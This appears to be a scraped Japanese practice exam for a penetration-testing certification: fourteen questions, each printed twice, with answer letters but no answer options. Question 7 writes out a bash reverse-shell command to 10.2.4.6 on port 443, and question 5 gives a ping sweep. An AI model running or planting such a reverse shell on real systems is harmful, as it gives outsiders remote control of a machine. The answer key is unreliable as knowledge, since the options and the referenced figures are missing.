問題1
セキュリティコンサルタントが以前に識別されたユーザーアカウントでデバイスを攻撃しようとしています。
次の種類の攻撃のうちどれが実行されていますか?
セキュリティコンサルタントが以前に識別されたユーザーアカウントでデバイスを攻撃しようとしています。
次の種類の攻撃のうちどれが実行されていますか?
正確答案: D
問題2
ペネトレーションテスト中に、テスターは悪用されたサーバーで実行されている従来のアンチウイルスを識別します。次の手法のうち、エクスプロイト後のフェーズでの永続性を最も確実にするのはどれですか?
ペネトレーションテスト中に、テスターは悪用されたサーバーで実行されている従来のアンチウイルスを識別します。次の手法のうち、エクスプロイト後のフェーズでの永続性を最も確実にするのはどれですか?
正確答案: A
問題3
ペネトレーションテスターは人的資源を呼び出し、自由形式の質問を開始します。ペネトレーションテスターが使用しているソーシャルエンジニアリング手法は次のうちどれですか。
ペネトレーションテスターは人的資源を呼び出し、自由形式の質問を開始します。ペネトレーションテスターが使用しているソーシャルエンジニアリング手法は次のうちどれですか。
正確答案: A
問題4
見込み顧客と侵入テスト契約を交渉する場合、将来の顧客のシステム違反の場合の責任を軽減するために、次の免責事項のどれを含める必要がありますか?
見込み顧客と侵入テスト契約を交渉する場合、将来の顧客のシステム違反の場合の責任を軽減するために、次の免責事項のどれを含める必要がありますか?
正確答案: B
問題5
ペネトレーションテスタが、異なるネットワーク上の新しいLinuxデバイスへのピボットを実行しました。 テスターは以下のコマンドを書き込みます。
for m in {1..254..1};do ping -c 1 192.168.101.$m; done
次のベストのどれがこのコマンドを実行した結果を説明していますか?
ペネトレーションテスタが、異なるネットワーク上の新しいLinuxデバイスへのピボットを実行しました。 テスターは以下のコマンドを書き込みます。
for m in {1..254..1};do ping -c 1 192.168.101.$m; done
次のベストのどれがこのコマンドを実行した結果を説明していますか?
正確答案: B
問題6
ログを確認しているときに、Web開発者はフィールドに次のユーザー入力文字列があることに気付きます。
次のタイプの攻撃のうち、Webサイトに対して行われたものはどれですか?
ログを確認しているときに、Web開発者はフィールドに次のユーザー入力文字列があることに気付きます。
次のタイプの攻撃のうち、Webサイトに対して行われたものはどれですか?
正確答案: C
問題7
テスターは、ターゲットシステムで次のコマンドを実行しようとしています。
bash -i >& /dev/tcp/10.2.4.6/443 0> &1
次の追加のコマンドのどれが前のコマンドを成功させるためにテスターのLinuxシステム上で実行される必要があるでしょうか?
テスターは、ターゲットシステムで次のコマンドを実行しようとしています。
bash -i >& /dev/tcp/10.2.4.6/443 0> &1
次の追加のコマンドのどれが前のコマンドを成功させるためにテスターのLinuxシステム上で実行される必要があるでしょうか?
正確答案: C
問題8
次の種類の侵入技術のうちどれが物理的なセキュリティ評価の間に「地下ツール」の使用であるか?
次の種類の侵入技術のうちどれが物理的なセキュリティ評価の間に「地下ツール」の使用であるか?
正確答案: D
問題9
ペネトレーションテスターがデフォルトのパブリックおよびプライベートコミュニティ文字列の使用を悪用しています次のプロトコルのどれが悪用されていますか?
ペネトレーションテスターがデフォルトのパブリックおよびプライベートコミュニティ文字列の使用を悪用しています次のプロトコルのどれが悪用されていますか?
正確答案: A
問題10
高度に規制された業界からの侵入テストのためにクライアントを関与させている間、ビジネスの観点からクライアントにとって最も重要なのは、どれですか。
高度に規制された業界からの侵入テストのためにクライアントを関与させている間、ビジネスの観点からクライアントにとって最も重要なのは、どれですか。
正確答案: A
問題11
ソフトウェア開発チームは最近、オンプレミス環境の新しいアプリケーションソフトウェアに移行しました侵入テストの結果から、複数の脆弱性が存在することがわかりましたVM確認のために最も重要なものはどれですか?
ソフトウェア開発チームは最近、オンプレミス環境の新しいアプリケーションソフトウェアに移行しました侵入テストの結果から、複数の脆弱性が存在することがわかりましたVM確認のために最も重要なものはどれですか?
正確答案: C
問題12
ある企業が、Webアプリケーションのペネトレーションテストを実行するためにコンサルタントを雇うための予算を計画し、確保しました。脆弱性が発見されると、同社はコンサルタントに次の作業を依頼しました。
* コードレビュー
* ファイアウォール設定の更新
ある企業が、Webアプリケーションのペネトレーションテストを実行するためにコンサルタントを雇うための予算を計画し、確保しました。脆弱性が発見されると、同社はコンサルタントに次の作業を依頼しました。
* コードレビュー
* ファイアウォール設定の更新
正確答案: D
問題13
エンゲージメント中に、機密性の高いPIIの抽出を可能にする、安全でない直接オブジェクト参照の脆弱性が発見されました。テスターは、1から1000までの識別子を持つWebアプリケーションから情報を抽出して抽出する必要があります。次のスクリプトを実行すると、エラーが発生します。
次のコード行のどれが問題を引き起こしていますか?
エンゲージメント中に、機密性の高いPIIの抽出を可能にする、安全でない直接オブジェクト参照の脆弱性が発見されました。テスターは、1から1000までの識別子を持つWebアプリケーションから情報を抽出して抽出する必要があります。次のスクリプトを実行すると、エラーが発生します。
次のコード行のどれが問題を引き起こしていますか?
正確答案: A
問題14
侵入テスト担当者がフィッシング詐欺キャンペーンを設計していて、ユーザーのリスト(またはターゲット組織)を作成したいと考えています。最も適切なテクニックはどれですか?(Select TWO)
侵入テスト担当者がフィッシング詐欺キャンペーンを設計していて、ユーザーのリスト(またはターゲット組織)を作成したいと考えています。最も適切なテクニックはどれですか?(Select TWO)
正確答案: B,C